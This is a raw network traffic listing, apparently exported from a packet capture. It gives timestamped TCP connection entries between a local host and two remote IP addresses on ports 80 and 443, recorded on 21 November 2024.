                                                                                                                                                                              Nov 21, 2024 08:30:37.090303898 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.090502977 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.090553045 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.091257095 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.091471910 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.092045069 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.092096090 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.092147112 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.092186928 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.092951059 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.093070984 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.093801022 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.093838930 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.093935013 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.093974113 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.094739914 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.094850063 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.095256090 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.095588923 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.095710993 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.096209049 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.096504927 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.096565962 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.096605062 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.097466946 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.097574949 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.098253965 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.098290920 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.098368883 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.098403931 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.099119902 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.099231958 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.099293947 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.100003958 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.100203991 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.100245953 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.101074934 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.101134062 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.101174116 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.101794958 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.101998091 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.102080107 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.102648973 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.102766991 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.102814913 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.103545904 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.103574038 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.103739977 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.104422092 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.104516029 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.104563951 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.105278969 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.105396986 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.105443001 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.106163979 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.106283903 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.106369019 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.107074976 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.107196093 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.107240915 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.107980013 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.108006954 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.108057976 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.108841896 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.109014034 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.109062910 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.109715939 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.109879017 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.110634089 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.110699892 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.110853910 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.110893011 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.111500025 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.111618042 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.112222910 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.112374067 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.112478018 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.113069057 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.113281012 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.113358974 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.113404989 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.114176035 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.114357948 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.114413977 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.115020037 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.115142107 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.115906954 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.116012096 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.116099119 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.116247892 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.116812944 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.116959095 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.117005110 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.117679119 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.117814064 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.117847919 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.118560076 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.118612051 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.118752956 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.119442940 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.119553089 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.119596004 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.120315075 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.120455980 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.120501995 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.121196032 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.121328115 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.121373892 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.122108936 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.122203112 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.122334003 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.122973919 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.157006025 CET4434976513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.157079935 CET4434976513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.157147884 CET49765443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:37.157426119 CET49765443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:37.157453060 CET4434976513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.157465935 CET49765443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:37.157473087 CET4434976513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.160223007 CET49771443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:37.160254955 CET4434977113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.160917044 CET49771443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:37.161089897 CET49771443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:37.161103010 CET4434977113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.169631958 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.183129072 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.354943991 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.396358013 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.396387100 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.396455050 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.434833050 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.435154915 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.515434980 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.515949965 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.515971899 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.515989065 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.516005039 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.516041994 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.516058922 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.516086102 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.516091108 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.516091108 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.516102076 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.516117096 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.516132116 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.516139984 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.516160965 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.516176939 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.516182899 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.516192913 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.516208887 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.516217947 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.516233921 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.516258955 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.516259909 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.516275883 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.516290903 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.516309023 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.516314030 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.516325951 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.516339064 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.516343117 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.516360044 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.516365051 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.516376019 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.516386986 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.516417027 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.516433954 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.516437054 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.516448975 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.516477108 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.516477108 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.516491890 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.516509056 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.516524076 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.516540051 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.516544104 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.516566038 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.516582012 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.516588926 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.516597986 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.516614914 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.516618013 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.516630888 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.516647100 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.516661882 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.516676903 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.516680956 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.516693115 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.516709089 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.516716957 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.516725063 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.516731977 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.516738892 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.516740084 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.516738892 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.516750097 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.516767979 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.516782045 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.516792059 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.516798973 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.516812086 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.516829967 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.516841888 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.516849995 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.516870975 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.516890049 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.516906023 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.516905069 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.516921043 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.516937017 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.516952038 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.516964912 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.516968012 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.516984940 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.516992092 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.516999960 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.517020941 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.517033100 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.517046928 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.517050028 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.517066956 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.517083883 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.517088890 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.517107964 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.517124891 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.517132044 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.517141104 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.517157078 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.517163992 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.517173052 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.517189026 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.517205000 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.517224073 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.517236948 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.517252922 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.517267942 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.517267942 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.517290115 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.517296076 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.517297029 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.517308950 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.517324924 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.517327070 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.517340899 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.517349005 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.517357111 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.517378092 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.517381907 CET4434976613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.517407894 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.517411947 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.517427921 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.517442942 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.517457008 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.517471075 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.517472982 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.517484903 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.517498970 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.517512083 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.517523050 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.517525911 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.517539978 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.517551899 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.517553091 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.517568111 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.517580032 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.517581940 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.517596006 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.517608881 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.517611980 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.517622948 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.517637968 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.517637968 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.517651081 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.517666101 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.517668962 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.517680883 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.517697096 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.517708063 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.517712116 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.517724991 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.517736912 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.517740965 CET4434976713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.517755985 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.517765999 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.517771006 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.517786026 CET4434976713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.517800093 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.517812967 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.517842054 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.517852068 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.517855883 CET49767443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:37.517865896 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.517879963 CET8049762185.215.113.16192.168.2.6
